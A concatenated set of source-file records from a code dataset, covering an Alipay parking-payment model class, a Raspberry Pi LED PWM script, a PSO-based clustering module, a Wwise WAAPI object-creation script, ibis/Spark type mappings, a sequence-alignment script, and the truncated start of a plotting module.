'to_alipay_dict'):\n params['pay_scene'] = self.pay_scene.to_alipay_dict()\n else:\n params['pay_scene'] = self.pay_scene\n if self.plate_color:\n if hasattr(self.plate_color, 'to_alipay_dict'):\n params['plate_color'] = self.plate_color.to_alipay_dict()\n else:\n params['plate_color'] = self.plate_color\n if self.plate_no:\n if hasattr(self.plate_no, 'to_alipay_dict'):\n params['plate_no'] = self.plate_no.to_alipay_dict()\n else:\n params['plate_no'] = self.plate_no\n if self.promo:\n if hasattr(self.promo, 'to_alipay_dict'):\n params['promo'] = self.promo.to_alipay_dict()\n else:\n params['promo'] = self.promo\n if self.seller_id:\n if hasattr(self.seller_id, 'to_alipay_dict'):\n params['seller_id'] = self.seller_id.to_alipay_dict()\n else:\n params['seller_id'] = self.seller_id\n if self.serial_no:\n if hasattr(self.serial_no, 'to_alipay_dict'):\n params['serial_no'] = self.serial_no.to_alipay_dict()\n else:\n params['serial_no'] = self.serial_no\n if self.subject:\n if hasattr(self.subject, 'to_alipay_dict'):\n params['subject'] = self.subject.to_alipay_dict()\n else:\n params['subject'] = self.subject\n if self.total_amount:\n if hasattr(self.total_amount, 'to_alipay_dict'):\n params['total_amount'] = self.total_amount.to_alipay_dict()\n else:\n params['total_amount'] = self.total_amount\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayEcoMycarParkingPayApplyModel()\n if 'in_time' in d:\n o.in_time = d['in_time']\n if 'out_order_no' in d:\n o.out_order_no = d['out_order_no']\n if 'out_serial_no' in d:\n o.out_serial_no = d['out_serial_no']\n if 'out_time' in d:\n o.out_time = d['out_time']\n if 'parking_id' in d:\n o.parking_id = d['parking_id']\n if 'pay_scene' in d:\n o.pay_scene = d['pay_scene']\n if 'plate_color' in d:\n o.plate_color = d['plate_color']\n if 'plate_no' in d:\n o.plate_no = d['plate_no']\n if 'promo' in d:\n o.promo = d['promo']\n if 'seller_id' in d:\n o.seller_id = d['seller_id']\n if 'serial_no' in d:\n o.serial_no = d['serial_no']\n if 'subject' in d:\n o.subject = d['subject']\n if 'total_amount' in d:\n o.total_amount = d['total_amount']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayEcoMycarParkingPayApplyModel.py","file_name":"AlipayEcoMycarParkingPayApplyModel.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352458190","text":"# 更改亮燈頻率\nimport RPi.GPIO as GPIO\nimport time\n\npinLED = 21\nfreq = 0.5\ndc = 0.5\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinLED,GPIO.OUT)\np = GPIO.PWM(pinLED,freq)\n\np.start(dc)\ninput('enter to stop')\np.ChangeFrequency(1)\np.ChangeDutyCycle(90)\ninput('enter to stop')\np.stop()\n\nGPIO.cleanup()\n","sub_path":"PWM_change_frequency.py","file_name":"PWM_change_frequency.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220723663","text":"import random\nimport math\nfrom k_means import K_MEANS\nimport sys\nsys.path.insert(0, '../')\nsys.path.insert(0, '../function_optimization/')\nimport vector_operations as vector\nfrom pso import PSO\n\nv1 = ( (3,6), (4,5), (4,7), (5,5), (5,6), (5,8) )\nv2 = ( (2,1), (2,-1), (3,2), (3,0), (4,1), (4,-1) ) \nv3 = ( (-1,3), (-2,2), (-2,4), (-3,3), (-4,2), (-4,4) )\ntest_vectors = v1 + v2 + v3\n\ndef mdist(v1, v2):\n\treturn -vector.distance(v1, v2)\n\nclass DCPSO:\n\t\n\tdef __init__(self, vectors = test_vectors, similarity = 'cosine', k_max = 10):\n\t\tself.vectors = vectors\n\t\tself.k_max = k_max\n\t\tself.len_vectors = len(self.vectors)\n\t\tif similarity == 'distance':\n\t\t\t#self.fitness_index = self.dcpso_i_index\n\t\t\tself.similarity_index = mdist\n\t\t\tself.e1 = 1000\n\t\tif similarity == 'cosine':\n\t\t\tself.similarity_index = vector.cosine\n\t\tself.iter_n = 0\n\t\tself.m = tuple( random.sample(self.vectors, k_max) )\n\t\t\n\tdef determine_cos(self, i):\n\t\tfor j in range(self.len_vectors):\n\t\t\tyield vector.cosine(self.vectors[i], self.vectors[j])\n\t\n\tdef run(self, n_new_iter = 20):\n\t\ttarget_n_iter = self.iter_n + n_new_iter\n\t\twhile self.iter_n < target_n_iter:\n\t\t\tself.run_iteration()\n\t\n\tdef run_iteration(self):\n\t\tself.iter_n += 1\n\t\tself.pso = PSO(self.random_swarm_particle, self.fitness_index, is_binary = True)\n\t\tself.pso.run(5)\n\t\tself.determine_clustering_info()\n\t\tself.m = self.adjusted_m()\n\t\tprint( self.iter_n )\n\t\n\tdef determine_clustering_info(self):\n\t\tmt = tuple( self.determine_mt() )\n\t\tself.k = len(mt)\n\t\t\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, self.k)\n\t\tkm.set_centroids(mt)\n\t\tkm.run()\n\t\t\n\t\tself.centroids = km.centroids\n\t\tself.n_clusters = self.k\n\t\tself.labels = km.labels\n\t\tself.clusters = km.clusters\n\t\tself.clusters_x = km.clusters_x\n\t\tself.best_fitness = self.pso.gb\n\t\tself.fitness = self.best_fitness\n\t\t\n\tdef determine_mt(self):\n\t\tfor i in range(self.k_max):\n\t\t\tif self.pso.gb_x[i] == 1:\n\t\t\t\tyield self.m[i]\n\t\n\tdef adjusted_m(self):\n\t\treturn self.centroids + tuple( random.sample(self.vectors, self.k_max - self.k) )\n\t\t\t\t\n\tdef random_swarm_particle(self):\n\t\treturn tuple( 1 if random.random() < 0.5 else 0 for i in range(self.k_max) )\n\t\t\n\tdef cluster_disimilarity(self, c1, c2):\n\t\tif len(c1) * len(c2) == 0:\n\t\t\treturn 1\n\t\treturn max( self.cos[c1i][c2i] for c1i in c1 for c2i in c2 )\n\t\t\n\tdef similarity(self, x, y):\n\t\tres = vector.cosine(x, y)\n\t\treturn res + 1.00001\n\tdef cluster_similarity(self, c1, c2):\n\t\t\treturn max( self.similarity(e1, e2) + 2 for e1 in c1 for e2 in c2 )\t\t\n\t\n\tdef dcpso_index(self, x):\n\t\td = len(self.vectors[0])\n\t\tk = len(x)\n\t\tnre = [0 for i in range(k)]\n\t\tsums = [0 for i in range(k)]\n\t\tcenters = [vector.zero_v(d) for i in range(k)]\n\t\tv = [ [] for i in range(k)]\n\t\tfor i in range(len(self.vectors)):\n\t\t\tclosest_cluster = 0\n\t\t\td_min = self.similarity(self.vectors[i], x[0])\n\t\t\tfor j in range(k):\n\t\t\t\tcd = self.similarity(self.vectors[i], x[j])\n\t\t\t\tif cd > d_min:\n\t\t\t\t\td_min = cd\n\t\t\t\t\tclosest_cluster = j\n\t\t\tnre[closest_cluster] += 1\n\t\t\tsums[closest_cluster] += d_min\n\t\t\tv[closest_cluster].append(self.vectors[i])\n\t\t\tcenters[closest_cluster] = vector.add(centers[closest_cluster], self.vectors[i])\n\t\t\n\t\tfor i in range(k):\n\t\t\tif nre[i] == 0:\n\t\t\t\treturn -100000\n\t\t\n\t\treturn self.f_upgma(k, v, sums, nre)\n\t\n\tdef cosine(self, x1, x2):\n\t\treturn vector.cosine(x1, x2) + 1.0001\n\t\n\tdef f_upgma(self, k, v, sums, nre):\n\t\tintra = sum( sums[i] / nre[i] for i in range(k) ) / k\n\t\tinter = max( self.upgma(v[i], v[j])\n\t\t\t\t\t\t\t\t\tfor i in range(k)\n\t\t\t\t\t\t\t\t\t\tfor j in range(i + 1, k) )\n\t\treturn intra / inter\n\t\n\tdef upgma(self, c1, c2):\n\t\ts = sum( self.cosine(e1, e2) for e1 in c1 for e2 in c2 )\n\t\tnr_pairs = len(c1) * len(c2)\n\t\treturn s / nr_pairs\n\t\n\tdef f212(self, nre, sums, v, k, centers):\n\t\tintra = min( sums[i] / nre[i] for i in range(k) )\n\t\tinter = max( self.cluster_similarity(v[i], v[j]) \n\t\t\t\t\t\t\t\t\t\t\tfor i in range(k) for j in range(k)[i+1:] )\n\t\treturn inter / intra\n\t\n\tdef fitness_index(self, x):\n\t\tif sum(x) < 2:\n\t\t\treturn -1000000\n\t\treturn self.dcpso_index(tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ))\n\t\n\tdef dcpso_v_index(self, x):\n\t\tprint(x)\n\t\treturn 10\n\t\tif sum(x) < 2:\n\t\t\treturn 100000\n\t\treturn self.v_index( tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ) )\n\t\n\tdef v_index(self, x):\n\t\tx_k = len(x)\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, x_k)\n\t\tkm.set_centroids(x)\n\t\tx_clusters = km.clusters_x\n\t\tek = 0\n\t\tfor j in range(x_k):\n\t\t\tfor vic in x_clusters[j]:\n\t\t\t\tek += vector.norm(vector.add( x[j], vector.sm(-1, vic) )) ** 2\n\t\tdk = min( vector.norm(vector.add(x[j], vector.sm(-1, x[i]))) ** 2\n\t\t\tfor i in range(x_k)\n\t\t\t\tfor j in range(x_k)[i+1:] )\n\t\treturn ek / dk\n\t\n\tdef intra(self, x):\n\t\tk = len(x)\n\t\td = len(self.vectors[0])\n\t\tnre = [0 for i in range(k)]\n\t\tsums = [0 for i in range(k)]\n\t\tfor i in range(len(self.vectors)):\n\t\t\tclosest_cluster = 0\n\t\t\td_min = self.similarity_index(self.vectors[i], x[0])\n\t\t\tfor j in range(k):\n\t\t\t\tcd = self.similarity_index(self.vectors[i], x[j])\n\t\t\t\tif cd > d_min:\n\t\t\t\t\td_min = cd\n\t\t\t\t\tclosest_cluster = j\n\t\t\tnre[closest_cluster] += 1\n\t\t\tsums[closest_cluster] += d_min\n\t\tfor i in range(k):\n\t\t\tif nre[i] == 0:\n\t\t\t\treturn 0.000001\n\t\tsums = [sums[i] / nre[i] for i in range(k)]\n\t\tsuma = sum(sums)\n\t\treturn suma\n\t\n\tdef tonio_index(self, x):\n\t\tx_k = len(x)\n\t\t\n\t\tinter = sum( vector.cosine(x[i], x[j]) for i in range(x_k) for j in range(x_k)[i+1:] ) / ((x_k*(x_k-1))/2)\n\t\t#inter = max( self.cluster_disimilarity(km.clusters[i], km.clusters[j]) for i in range(x_k) for j in range(x_k)[i+1:] ) \n\t\t\n\t\treturn inter / self.intra(x)\n\t\n\tdef dcpso_i_index(self, x):\n\t\tif sum(x) < 2:\n\t\t\treturn 100000\n\t\treturn self.i_index( tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ) )\n\t\n\tdef i_index(self, x):\n\t\tx_k = len(x)\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, x_k)\n\t\tkm.set_centroids(x)\n\t\tx_clusters = km.clusters_x\n\t\tek = 0\n\t\tfor j in range(x_k):\n\t\t\tfor vic in x_clusters[j]:\n\t\t\t\tek += vector.norm(vector.add( x[j], vector.sm(-1, vic) ))\n\t\tdk = max( vector.norm(vector.add(x[j], vector.sm(-1, x[i])))\n\t\t\tfor i in range(x_k)\n\t\t\t\tfor j in range(x_k)[i+1:] )\n\t\treturn -( self.e1 * dk ) / ( x_k * ek )\n\n","sub_path":"toolbox/clustering/dcpso.py","file_name":"dcpso.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25790094","text":"import os\nimport sys\n\nimport asyncio\n\nsys.path.append('..')\n\nfrom autobahn.asyncio.wamp import ApplicationRunner\nfrom ak_autobahn import AkComponent\n\nimport fnmatch\n\nfrom waapi_SG import WAAPI_URI\n\nimport tkinter\nfrom tkinter import filedialog\n\n\nclass MyComponent(AkComponent):\n\n# this script allows creation of Wwise objects and events\n# Selecting a parent object in wwise triggers a callback that\n# creates the desired object type underneath the selected parent\n# Optionally, it is possible to create an event at the same time\n# that Plays the recently created object....\n\n\n#store a ref to the selected parent object\n parentObject = None\n\n#flow control\n parentSelected = False\n objectCreated = False\n eventCreated = False\n\n#dic to store return/results from yield calls\n Results = {}\n\n#Variables for object creation\n objParID = \"None\"\n objType = \"\"\n objName = \"\"\n nameConflict = \"merge\"\n objNotes = \"This object was auto created....\"\n\n#args dict for object creation For use with create object call\n createObjArgs = {}\n\n#variables for event creation\n eventName = \"\"\n eventTarget = \"\"\n evActionType = 1\n\n#args dict for event creation\n createEventArgs = {}\n\n#args for audio import\n INPUT_audioFilePath = \"~/Projects/Wwise/WAAPI/AudioFiles\"\n INPUT_audioFileList = []\n INPUT_originalsPath = \"WAAPI/TestImports\"\n\n importArgs = {}\n\n#Input variables. TO DO: Drive these from data e.g Reaper\n INPUT_ObjectType = \"BlendContainer\"\n INPUT_ObjectName = \"MyCreatedObject\"\n OPTION_CreateEvent = True\n\n\n\n\n def printThis(self,msg):\n print(msg)\n\n def onJoin(self, details):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_getinfo) # RPC call without arguments\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n # Call was successful, displaying information from the payload.\n print(\"Hello {} {}\".format(res.kwresults['displayName'], res.kwresults['version']['displayName']))\n\n MyComponent.printThis(self,\"Test\")\n\n\n def askUserForImportDirectory():\n root = tkinter.Tk()\n root.withdraw()\n root.update()\n MyComponent.INPUT_audioFilePath = filedialog.askdirectory(title=\"Choose source directory\")\n root.update()\n root.destroy()\n print(MyComponent.INPUT_audioFilePath)\n\n\n def setupSubscriptions():\n # Subscribe to ak.wwise.core.object.created\n # Calls on_object_created whenever the event is received\n self.subscribe(onParentSelected, WAAPI_URI.ak_wwise_ui_selectionchanged)\n\n objCreateSubArgs = {\n \"options\": {\n \"return\": [\"type\", \"name\", \"category\", \"id\", \"path\"]\n }\n }\n self.subscribe(onObjectCreated, WAAPI_URI.ak_wwise_core_object_created, **objCreateSubArgs)\n\n def ResetGates():\n MyComponent.parentSelected = False\n MyComponent.objectCreated = False\n MyComponent.eventCreated = False\n\n def onSelectionChanged(objects):\n print(\"Selection changed\")\n\n def onParentSelected(objects):\n # subscribe to selection change?\n if not MyComponent.parentSelected:\n print(\"Method to get the parent to create new object under\")\n success = False\n parID = None\n MyComponent.parentObject = objects[0]\n #getSelectedObject()\n print(\"Selected object is...\")\n\n if MyComponent.parentObject != None:\n success = True\n print(\"Selected object name is...{}\".format(MyComponent.parentObject[u\"name\"]))\n parID = str(MyComponent.parentObject[\"id\"])\n MyComponent.parentSelected = True\n\n if success:\n setupCreateArgs(parID, MyComponent.INPUT_ObjectType, MyComponent.INPUT_ObjectName) # include optional arguments for type/name/conflict\n yield from createWwiseObject(MyComponent.createObjArgs)\n print(MyComponent.Results)\n MyComponent.objectCreated = True\n else:\n print(\"Something went wrong!!\")\n return\n\n #import audio\n setupAudioFilePath()\n importParent = MyComponent.Results.kwresults['id']\n setupImportArgs(importParent, MyComponent.INPUT_audioFileList,MyComponent.INPUT_originalsPath)\n yield from importAudioFiles(MyComponent.importArgs)\n\n #Setup an event to play the created object\n if MyComponent.OPTION_CreateEvent:\n evName = MyComponent.Results.kwresults[\"name\"]\n evTarget = str(MyComponent.Results.kwresults[\"id\"])\n setupEventArgs(evName, evTarget)\n yield from createWwiseObject(MyComponent.createEventArgs)\n print(MyComponent.Results)\n MyComponent.eventCreated = True\n\n saveWwiseProject()\n\n self.leave()\n\n def saveWwiseProject():\n yield from self.call(WAAPI_URI.ak_wwise_core_project_save)\n\n def setupEventArgs(oname,otarget,oactionType = 1):\n print(\"setting up event\")\n\n MyComponent.eventName = oname\n MyComponent.eventTarget = otarget\n MyComponent.evActionType = oactionType\n\n MyComponent.createEventArgs = {\n\n \"parent\": \"\\\\Events\\\\Default Work Unit\",\n \"type\": \"Folder\",\n \"name\": \"WAAPI Auto Events\",\n \"onNameConflict\": \"merge\",\n \"children\": [\n {\n \"type\": \"Event\",\n \"name\": \"Play_\" + MyComponent.eventName,\n \"children\": [\n {\n \"name\": \"\",\n \"type\": \"Action\",\n \"@ActionType\": MyComponent.evActionType,\n \"@Target\": MyComponent.eventTarget\n }\n ]\n }\n ]\n }\n\n def setupCreateArgs(parentID ,otype = \"BlendContainer\", oname = \"AutoCreatedObject\", conflict = \"merge\"):\n #check the inputs\n if otype == \"\":\n MyComponent.objType = \"BlendContainer\"\n print(\"Defaulting type to Blend Container\")\n else:\n MyComponent.objType = otype\n if oname == \"\":\n MyComponent.objName = \"AutoCreatedObject\"\n print(\"Defaulting name to AutoCreatedObject\")\n else:\n MyComponent.objName = oname\n\n\n MyComponent.objParID = parentID\n MyComponent.nameConflict = conflict\n\n MyComponent.createObjArgs = {\n\n \"parent\": MyComponent.objParID,\n \"type\": MyComponent.objType,\n \"name\": MyComponent.objName,\n \"onNameConflict\": MyComponent.nameConflict,\n \"notes\": MyComponent.objNotes\n\n }\n\n def setupAudioFilePath():\n print(\"Setting up audio file path\")\n pathToFiles = os.path.expanduser(MyComponent.INPUT_audioFilePath)\n setupAudioFileList(pathToFiles)\n\n def setupAudioFileList(path):\n print(\"Setting up list of audio files\")\n\n filelist = []\n pattern = '*.wav'\n for root, dirs, files in os.walk(path):\n # for file in os.listdir(path):\n for filename in fnmatch.filter(files, pattern):\n absFilePath = os.path.abspath(os.path.join(root, filename))\n filelist.append(absFilePath)\n\n MyComponent.INPUT_audioFileList = filelist\n\n def setupImportArgs(parentID, fileList,originalsPath):\n print (\"Args for audio importing\")\n ParentID = str(parentID)\n importFilelist = []\n for audiofile in fileList:\n foo = audiofile.rsplit('.') #remove extension from filename\n audiofilename = foo[0]\n importFilelist.append(\n {\n \"audioFile\": audiofile,\n \"objectPath\": \"\"+os.path.basename(audiofilename)\n }\n )\n\n MyComponent.importArgs = {\n \"importOperation\": \"useExisting\",\n \"default\": {\n \"importLanguage\": \"SFX\",\n \"importLocation\": ParentID,\n \"originalsSubFolder\": originalsPath\n },\n \"imports\": importFilelist\n\n }\n print (MyComponent.importArgs)\n\n def getSelectedObject():\n try:\n x = yield from self.call(WAAPI_URI.ak_wwise_ui_getselectedobjects)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n #print (x)\n MyComponent.Results = x\n\n def createWwiseObject(args):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_object_create, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n MyComponent.Results = res\n\n def importAudioFiles(args):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_audio_import, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n #MyComponent.Results = res\n\n def onObjectCreated(**kwargs):\n if not MyComponent.eventCreated:\n print(\"Object was created\")\n print(kwargs)\n ob = kwargs[\"object\"]\n obID = ob[\"id\"]\n arguments = {\n \"from\": {\"id\": [obID]},\n \"options\": {\n \"return\": [\"type\", \"name\", \"category\",\"id\",\"path\"]\n }\n }\n try:\n res2 = yield from self.call(WAAPI_URI.ak_wwise_core_object_get, **arguments)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n print(res2.kwresults)\n\n askUserForImportDirectory()\n\n setupSubscriptions()\n\n #yield setupAudioFilePath()\n\n print(\"This is the name of the script\", sys.argv[0])\n print(\"This is the number of arguments\", len(sys.argv))\n print(\"The arguments are...\", str(sys.argv))\n\n\n\n print(\"This script will auto create wwise objects and events...\")\n print(\"...Select an object to be the parent in the Project Explorer\")\n\n\n\n\n\n def onDisconnect(self):\n print(\"The client was disconnected.\")\n\n asyncio.get_event_loop().stop()\n\n\nif __name__ == '__main__':\n runner = ApplicationRunner(url=u\"ws://127.0.0.1:8095/waapi\", realm=u\"realm1\")\n try:\n runner.run(MyComponent)\n except Exception as e:\n print(type(e).__name__ + \": Is Wwise running and Wwise Authoring API enabled?\")\n","sub_path":"SimpleCreateAndImport/CreateNewObjects_WithImport.py","file_name":"CreateNewObjects_WithImport.py","file_ext":"py","file_size_in_byte":11349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561944764","text":"import functools\n\nimport pyspark.sql.types as pt\n\nimport ibis.common.exceptions as com\nimport ibis.expr.datatypes as dt\nfrom ibis.backends.base.sql.registry import sql_type_names\nfrom ibis.expr.schema import Schema\n\n_sql_type_names = dict(sql_type_names, date='date')\n\n\ndef type_to_sql_string(tval):\n if isinstance(tval, dt.Decimal):\n return 'decimal({}, {})'.format(tval.precision, tval.scale)\n name = tval.name.lower()\n try:\n return _sql_type_names[name]\n except KeyError:\n raise com.UnsupportedBackendType(name)\n\n\n# maps pyspark type class to ibis type class\n_SPARK_DTYPE_TO_IBIS_DTYPE = {\n pt.NullType: dt.Null,\n pt.StringType: dt.String,\n pt.BinaryType: dt.Binary,\n pt.BooleanType: dt.Boolean,\n pt.DateType: dt.Date,\n pt.DoubleType: dt.Double,\n pt.FloatType: dt.Float,\n pt.ByteType: dt.Int8,\n pt.IntegerType: dt.Int32,\n pt.LongType: dt.Int64,\n pt.ShortType: dt.Int16,\n pt.TimestampType: dt.Timestamp,\n}\n\n\n@dt.dtype.register(pt.DataType)\ndef spark_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n \"\"\"Convert Spark SQL type objects to ibis type objects.\"\"\"\n ibis_type_class = _SPARK_DTYPE_TO_IBIS_DTYPE.get(type(spark_dtype_obj))\n return ibis_type_class(nullable=nullable)\n\n\n@dt.dtype.register(pt.DecimalType)\ndef spark_decimal_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n precision = spark_dtype_obj.precision\n scale = spark_dtype_obj.scale\n return dt.Decimal(precision, scale, nullable=nullable)\n\n\n@dt.dtype.register(pt.ArrayType)\ndef spark_array_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n value_type = dt.dtype(\n spark_dtype_obj.elementType, nullable=spark_dtype_obj.containsNull\n )\n return dt.Array(value_type, nullable=nullable)\n\n\n@dt.dtype.register(pt.MapType)\ndef spark_map_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n key_type = dt.dtype(spark_dtype_obj.keyType)\n value_type = dt.dtype(\n spark_dtype_obj.valueType, nullable=spark_dtype_obj.valueContainsNull\n )\n return dt.Map(key_type, value_type, nullable=nullable)\n\n\n@dt.dtype.register(pt.StructType)\ndef spark_struct_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n names = spark_dtype_obj.names\n fields = spark_dtype_obj.fields\n ibis_types = [dt.dtype(f.dataType, nullable=f.nullable) for f in fields]\n return dt.Struct(names, ibis_types, nullable=nullable)\n\n\n_IBIS_DTYPE_TO_SPARK_DTYPE = {\n v: k for k, v in _SPARK_DTYPE_TO_IBIS_DTYPE.items()\n}\n\nspark_dtype = functools.singledispatch('spark_dtype')\n# from multipledispatch import Dispatcher\n# spark_dtype = Dispatcher('spark_dtype')\n\n\n@spark_dtype.register(object)\ndef default(value, **kwargs) -> pt.DataType:\n raise com.IbisTypeError('Value {!r} is not a valid datatype'.format(value))\n\n\n@spark_dtype.register(pt.DataType)\ndef from_spark_dtype(value: pt.DataType) -> pt.DataType:\n return value\n\n\n@spark_dtype.register(dt.DataType)\ndef ibis_dtype_to_spark_dtype(ibis_dtype_obj):\n \"\"\"Convert ibis types types to Spark SQL.\"\"\"\n return _IBIS_DTYPE_TO_SPARK_DTYPE.get(type(ibis_dtype_obj))()\n\n\n@spark_dtype.register(dt.Decimal)\ndef ibis_decimal_dtype_to_spark_dtype(ibis_dtype_obj):\n precision = ibis_dtype_obj.precision\n scale = ibis_dtype_obj.scale\n return pt.DecimalType(precision, scale)\n\n\n@spark_dtype.register(dt.Array)\ndef ibis_array_dtype_to_spark_dtype(ibis_dtype_obj):\n element_type = spark_dtype(ibis_dtype_obj.value_type)\n contains_null = ibis_dtype_obj.value_type.nullable\n return pt.ArrayType(element_type, contains_null)\n\n\n@spark_dtype.register(dt.Map)\ndef ibis_map_dtype_to_spark_dtype(ibis_dtype_obj):\n key_type = spark_dtype(ibis_dtype_obj.key_type)\n value_type = spark_dtype(ibis_dtype_obj.value_type)\n value_contains_null = ibis_dtype_obj.value_type.nullable\n return pt.MapType(key_type, value_type, value_contains_null)\n\n\n@spark_dtype.register(dt.Struct)\n@spark_dtype.register(Schema)\ndef ibis_struct_dtype_to_spark_dtype(ibis_dtype_obj):\n fields = [\n pt.StructField(n, spark_dtype(t), t.nullable)\n for n, t in zip(ibis_dtype_obj.names, ibis_dtype_obj.types)\n ]\n return pt.StructType(fields)\n","sub_path":"ibis/backends/spark/datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481076740","text":"from pprint import pprint\r\n\r\ndef align(s,t):\r\n i=0\r\n j=0\r\n for i in range(0,len(s)+1):\r\n h=[]\r\n for j in range(0,len(t)+1):\r\n h.append(0)\r\n y.append(h)\r\n for i in range(0,len(s)+1):\r\n r=[]\r\n for j in range(0,len(t)+1):\r\n r.append(0)\r\n x.append(r)\r\n for i in range(0,len(t)+1):\r\n x[0][i]=0\r\n for i in range(0,len(s)+1):\r\n x[i][0]=0\r\n for i in range(1,len(s)+1):\r\n for j in range(1,len(t)+1):\r\n MAX_A=(x[i-1][j-1] + score(s[i-1],t[j-1]))\r\n MAX_B=(x[i-1][j] + score(s[i-1],'-'))\r\n MAX_C=(x[i][j-1] + score('-',t[j-1]))\r\n if ( MAX_A > MAX_B) and (MAX_A > MAX_C) and MAX_A>0:\r\n x[i][j] = MAX_A\r\n y[i][j] = 'Y'\r\n elif MAX_B > MAX_C and MAX_B>0:\r\n x[i][j] = MAX_B\r\n y[i][j] = '|'\r\n elif MAX_C>0:\r\n x[i][j] = MAX_C\r\n y[i][j] = '-'\r\n else:\r\n x[i][j] = 0\r\n y[i][j] = 'B'\r\n counter1=0\r\n counter2=0\r\n max_score=-1\r\n max_x=0\r\n max_y=0\r\n for counter1 in range(0,len(s)+1):\r\n for counter2 in range(0,len(t)+1):\r\n if x[counter1][counter2]>max_score:\r\n max_score=x[counter1][counter2]\r\n max_x=counter1\r\n max_y=counter2\r\n align_s = ''\r\n align_t = ''\r\n counter1=max_x\r\n counter2=max_y\r\n while_turn=0\r\n while counter1!=0 or counter2!=0:\r\n if y[counter1][counter2]=='Y':\r\n counter1=counter1-1\r\n counter2=counter2-1\r\n align_s=s[counter1]+align_s\r\n align_t=t[counter2]+align_t\r\n elif y[counter1][counter2] == '|':\r\n counter1=counter1-1\r\n align_s=s[counter1]+align_s\r\n align_t='-'+align_t\r\n elif y[counter1][counter2] == 'B':\r\n counter2=counter2-1\r\n break\r\n else:\r\n break\r\n while_turn=while_turn+1\r\n return counter2\r\ndef score(a,b):\r\n if a==b:\r\n return 1\r\n else:\r\n return -1\r\nx=[]\r\ny=[]\r\nt=''\r\np1=None\r\np2=None\r\ncounter=0\r\ncounter_1=0\r\nname=''\r\nname_ref=''\r\nref=''\r\ns=''\r\nwith open(\"small_ref.fa\") as f2:\r\n for line in f2:\r\n if counter==0:\r\n name_ref=line.strip()\r\n counter=1\r\n else:\r\n ref=ref+line.strip()\r\nprint('name ref',name_ref,'ref',ref)\r\n\r\n\r\ncounter=0\r\ndifc=''\r\nwith open(\"small.fastq\") as f1:\r\n with open('output.txt', 'w') as f2:\r\n for line in f1:\r\n if counter == 0:\r\n name = line.strip()\r\n counter += 1\r\n continue\r\n if counter == 1:\r\n s = line.strip()\r\n counter += 1\r\n continue\r\n if counter == 2:\r\n counter += 1\r\n continue\r\n if counter == 3:\r\n difc = line.strip()\r\n counter = 0\r\n print(name, name_ref, align(s, ref), s, difc, sep='\\t', file=f2)\r\n","sub_path":"genome local with files[DONE].py","file_name":"genome local with files[DONE].py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51664612","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdate\r\nimport calmap\r\n'''\r\n Chronological Analysis\r\n\r\n Functions:\r\n num_year()\r\n num_month(year)\r\n num_weekday(month, year)\r\n dayofyear(year, month = [1,12])\r\n bar_month()\r\n timeofday(year)\r\n bar_date(year)\r\n bar_date_top(year, top = 10, reverse = False)\r\n calheatmap(year)\r\n \r\n Author: Xu Zhu\r\n'''\r\n\r\npd.plotting.register_matplotlib_converters()\r\nplt.rcParams['figure.figsize'] = (20.0, 15.0)\r\nplt.rcParams['figure.dpi'] = 100\r\nplt.rcParams['font.size'] = 16\r\n\r\ndef plot_num_avg(x_axis, xlab, num, numlab, avg, avglab, title, isweek = False):\r\n '''\r\n Line plot: x = x_axis y = num, avg\r\n xlab, numlab, avglab for label\r\n if isweek == True, x will be daynames of aweek\r\n x, y label fontsize = 20\r\n title fontsize = 24\r\n '''\r\n assert len(x_axis) == len(num) and len(x_axis) == len(avg) #check data length\r\n assert all(isinstance(x, str) for x in [xlab, numlab, avglab, title])\r\n \r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel(xlab, fontsize = 20)\r\n ax_num.set_ylabel(numlab, fontsize = 20)\r\n ax_num.set_title(title, fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n ax_num.yaxis.set_ticklabels(['1.8M', '1.9M', '2M', '2.1M', '2.2M', '2.3M'])\r\n\r\n ax_avg = ax_num.twinx()\r\n ln2 = ax_avg.plot(x_axis, avg, 'b--o', label='avg_fine')\r\n ax_avg.set_ylabel(avglab, fontsize = 20)\r\n ax_avg.set_ylim([65, 75])\r\n\r\n ln = ln1 + ln2\r\n labels = [l.get_label() for l in 